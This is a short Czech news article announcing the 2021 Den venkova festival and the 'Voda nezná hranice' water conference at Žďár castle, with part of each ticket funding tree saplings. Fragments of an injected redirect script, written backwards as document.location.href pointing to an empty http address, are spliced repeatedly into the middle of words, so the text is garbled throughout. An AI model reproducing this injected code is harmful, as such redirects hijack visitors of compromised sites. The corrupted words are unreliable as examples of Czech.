Rainbow page separator

Výtěžek ze Dne venkova podpoří výsadbu ve Žďárských vrších

Pondělí, 20. září 2021

Žďár nad Sázavou / Mezinárodní konferencí s názvem Voda nezná hranice v sobotu 25. září zahájí tradiční Den venkova ve žďárském zámku. Právě voda je le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos jeho stěžejním tématem. Celodenní program pro veřejnost se bude odehrávat v zámeckém sadu, nebudou chybět komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované ukázky lesní techniky, jízda na koních, střelba z posedu nebo ukázka výcviku loveckých psů. Ve spolupráci s rakouským Naturpark Heidenreichsteiner Moor dojde na premiéru nového interaktivního programu zaměřenou na koloběh vody v přírodě, zahraje hráč na skleničky naplněné vodou Petr Špatina a studenti a učitelé Střední průmyslové školy chemické v Pardubicích předvedou, jak se hledá voda pomocí virgule. Lidé dostanou možnost zabavit se při programu vodních hudebních i výtvarných ateliérů a pokusech s vodou, ochutnat ryby z místních rybníků a mnoho dalšího. Atmosféru hudbou podtrhne swingové trio Hot Sisters, Zelenohorští muzikanti nebo folklorní soubor Kamínek. „Téma vody je se žďárským zámkem spja[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to odnepaměti, zajímavosti o vodě a její udržitelnosti se návštěvníci dozvědí hravou formou, a pokud budou mít zájem, tak mohou navštívit i konferenci, kde je bude čekat odborné doplnění,“ uvedla koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka akce Martina Sedláková. Účastí na Dni venkova lidé navíc podpoří obnovu místních lesů ohrožených suchem, vichřicemi a kůrovcem. Z každé vstupenky část financí poputuje na zakoupení jedné sazeničky stromku, která bude vysazena ve Žďárských vrších. Vstupné na Den venkova vyjde na s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to korun, zvýhodněné je za šedesát a rodinné za 280 korun.